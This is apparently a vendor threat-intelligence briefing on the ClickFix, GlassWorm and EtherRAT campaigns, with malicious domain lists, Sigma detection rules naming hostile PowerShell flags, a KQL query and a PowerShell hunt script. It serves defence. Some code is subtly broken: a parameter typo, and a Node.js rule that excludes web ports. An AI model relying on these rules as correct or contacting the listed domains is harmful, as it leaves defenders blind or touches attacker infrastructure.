Back to Intelligence

ClickFix, GlassWorm & EtherRAT: Multi-Vector Social Engineering and Blockchain C2 Campaigns — Enterprise Detection Pack

SA
Security Arsenal Team
April 28, 2026
6 min read

Threat Intelligence Briefing: Multi-Vector Campaigns Leveraging LotL and Blockchain C2

Threat Summary

Recent OTX pulse data indicates a surge in sophisticated initial access vectors combining social engineering with supply chain compromises. We are tracking three distinct clusters: ClickFix campaigns distributing information stealers (Lumma, Vidar) via browser-based social engineering; GlassWorm, a modular infostealer targeting developers through compromised code repositories; and EtherRAT, a North Korean APT-linked Node.js backdoor utilizing "EtherHiding" to store C2 infrastructure within Ethereum smart contracts. Collectively, these threats bypass traditional network defenses by living off the land (LotL), abusing blockchain technology for resilience, and leveraging trusted developer tools.

Threat Actor / Malware Profile

ClickFix Clusters (Vidar, Lumma, Redline)

  • Distribution: Social engineering campaigns impersonating Intuit QuickBooks and Booking.com. Victims are manipulated into copying and pasting malicious commands into native system tools (Terminal/PowerShell).
  • Payload Behavior: Information stealers targeting credentials, cookies, and cryptocurrency wallets.
  • C2 Communication: HTTP/HTTPS to compromised domains (e.g., ustazazharidrus.com, account-help.info).
  • Persistence: Scheduled tasks or registry run keys established via the initial script.
  • Anti-Analysis: Heavy obfuscation in the initial batch/PowerShell stages to evade signature detection.

GlassWorm

  • Distribution: Supply chain attack via compromised package managers (npm, PyPI) targeting software developers.
  • Payload Behavior: Fingerprinting machine environment, fetching payloads via the Solana blockchain, installing a fake browser extension for surveillance, and deploying a RAT.
  • C2 Communication: Uses Solana blockchain for payload retrieval; standard HTTP for data exfiltration.
  • Persistence: Malicious browser extensions injected into developer profiles.

EtherRAT (North Korean APT)

  • Distribution: IT support scams and likely malicious Node.js packages.
  • Payload Behavior: Node.js based backdoor allowing arbitrary command execution, system info gathering (via sys_info module), and asset theft.
  • C2 Communication: "EtherHiding"—extracts C2 addresses from Ethereum smart contract transaction input data. Uses CDN-like beaconing to blend in with legitimate web traffic.
  • Persistence: Windows service or scheduled task masquerading as a system update.

IOC Analysis

The provided indicators consist primarily of domains and hostnames associated with the ClickFix and EtherRAT campaigns.

  • Indicator Types:
    • Domains: ustazazharidrus.com, account-help.info, o-parana.com, jariosos.com.
    • Hostnames: rpc.payload.de.
  • Operationalization: SOC teams should immediately block these domains at the perimeter (DNS Firewall / Proxy) and hunt for historical DNS resolution events over the last 60 days. Given the use of "EtherHiding" and domain generation algorithms (DGAs), relying solely on static IOCs is insufficient; behavioral detection of Node.js processes and PowerShell execution is required.
  • Decoding Tooling: Use CyberChef or standard base64 decoders for the obfuscated scripts often dropped by ClickFix.

Detection Engineering

Sigma Rules

YAML
title: ClickFix Suspicious PowerShell via Clipboard
date: 2026/04/29
status: experimental
description: Detects potential ClickFix activity where PowerShell is invoked with flags typical of copy-paste social engineering attacks (e.g., hidden window, encoded commands) spawned by user interaction processes like browsers or explorer.
references:
    - https://otx.alienvault.com/pulse/626ba6b3970a16d2f95c8f2c
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\msedge.exe'
            - '\firefox.exe'
            - '\explorer.exe'
        Image|endswith: '\powershell.exe'
        CommandLine|contains:
            - ' -w hidden'
            - ' -enc '
            - ' -nop '
            - 'CopyToClipboard'
    condition: selection
falsepositives:
    - Legitimate administrative scripts
level: high
tags:
    - attack.initial_access
    - attack.execution
    - attack.t1059.001
    - clickfix
---
title: EtherRAT Node.js Process Network Activity
date: 2026/04/29
status: experimental
description: Detects Node.js processes establishing network connections, suspicious for EtherRAT backdoor activity or malware utilizing Node.js payloads.
references:
    - https://otx.alienvault.com/pulse/626ba6b3970a16d2f95c8f2d
author: Security Arsenal
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Image|endswith: '\node.exe'
        Initiated: 'true'
    filter_legit:
        DestinationPort|contains:
            - '80'
            - '443'
            - '8080'
    condition: selection | not filter_legit
falsepositives:
    - Legitimate Node.js web servers running locally
level: medium
tags:
    - attack.command_and_control
    - attack.t1071.001
    - etherrat
---
title: Suspicious Browser Extension Registry Modification
date: 2026/04/29
status: experimental
description: Detects registry modifications that add or update browser extensions, potentially indicating GlassWorm or other extension-based malware persistence.
references:
    - https://otx.alienvault.com/pulse/626ba6b3970a16d2f95c8f2e
author: Security Arsenal
logsource:
    category: registry_set
    product: windows
detection:
    selection_chrome:
        TargetObject|contains: '\Software\Google\Chrome\Extensions\'
        Details|contains: 'update_url'
    selection_edge:
        TargetObject|contains: '\Software\Microsoft\Edge\Extensions\'
    condition: 1 of selection*
falsepositives:
    - Legitimate software installing extensions
level: medium
tags:
    - attack.persistence
    - attack.t1547.001
    - glassworm

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for ClickFix and EtherRAT Network Indicators
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any ("ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com", "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com", "o-parana.com", "rpc.payload.de", "jariosos.com", "hayesmed.com", "regancontrols.com", "salinasrent.com", "justtalken.com", "mebeliotmasiv.com")
| summarize Count = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by DeviceName, RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine
| order by Count desc

PowerShell Hunt Script

PowerShell
<#
.SYNOPSIS
    Hunt script for ClickFix, GlassWorm, and EtherRAT artifacts.
.DESCRIPTION
    Checks DNS cache for malicious domains, registry for suspicious browser extensions, and processes for Node.js anomalies.
#>

$MaliciousDomains = @(
    "ustazazharidrus.com", "account-help.info", "quiptly.com", "elive123go.com",
    "visitbundala.com", "nhacaired88.com", "subsgod.com", "ariciversontile.com",
    "o-parana.com", "rpc.payload.de", "jariosos.com", "hayesmed.com",
    "regancontrols.com", "salinasrent.com", "justtalken.com", "mebeliotmasiv.com"
)

Write-Host "[*] Checking DNS Cache for malicious domains..."
$DnsCache = Get-DnsClientCache
foreach ($Domain in $MaliciousDomains) {
    $Found = $DnsCache | Where-Object { $_.Entry -like "*$Domain*" }
    if ($Found) {
        Write-Host "[!] Suspicious DNS Entry found: $($Found.Entry) - IP: $($Found.Data)" -ForegroundColor Red
    }
}

Write-Host "[*] Checking for Suspicious Browser Extensions (Chrome/Edge)..."
$Paths = @(
    "HKCU:\Software\Google\Chrome\Extensions",
    "HKLM:\Software\Google\Chrome\Extensions",
    "HKCU:\Software\Microsoft\Edge\Extensions",
    "HKLM:\Software\Microsoft\Edge\Extensions"
)

foreach ($Path in $Paths) {
    if (Test-Path $Path) {
        Get-ChildItem $Path -ErrorAction SilentlyContinue | ForEach-Object {
            $ExtPath = $_.Name
            $UpdateUrl = (Get-ItemProperty $_.PSPath -ErrorAction SilentlyContinue)."update_url"
            if ($UpdateUrl -and $UpdateUrl -notmatch "clients2.google.com") {
                Write-Host "[!] Non-Google update URL found in $ExtPath : $UpdateUrl" -ForegroundColor Yellow
            }
        }
    }
}

Write-Host "[*] Checking for Node.js processes listening on network..."
$NodeProcs = Get-NetTCPConnection -OwningProcess (Get-Process node -ErrorAction SilentlyContinue).Id -ErrorAction SilentlyConnect
if ($NodeProcs) {
    Write-Host $NodeProcs | Format-Table LocalAddress, LocalPort, State, OwningProcess
}

Response Priorities

  • Immediate:
    • Block all listed domains and hostnames at the DNS resolver and proxy level.
    • Hunt for powershell.exe processes spawned by browsers.
  • 24 Hours:
    • Audit developer workstations for signs of GlassWorm (unusual browser extensions, Solana blockchain interaction).
    • Verify identity and session integrity for developers and finance staff due to infostealer presence (Vidar/Lumma).
  • 1 Week:
    • Implement strict allowlisting for browser extensions.
    • Review and restrict Node.js execution policies in production environments.
    • Update security awareness training to include "ClickFix" scenarios (fake tech support asking users to paste code).

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptclickfixetherratglasswormsupply-chaininitial-access

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action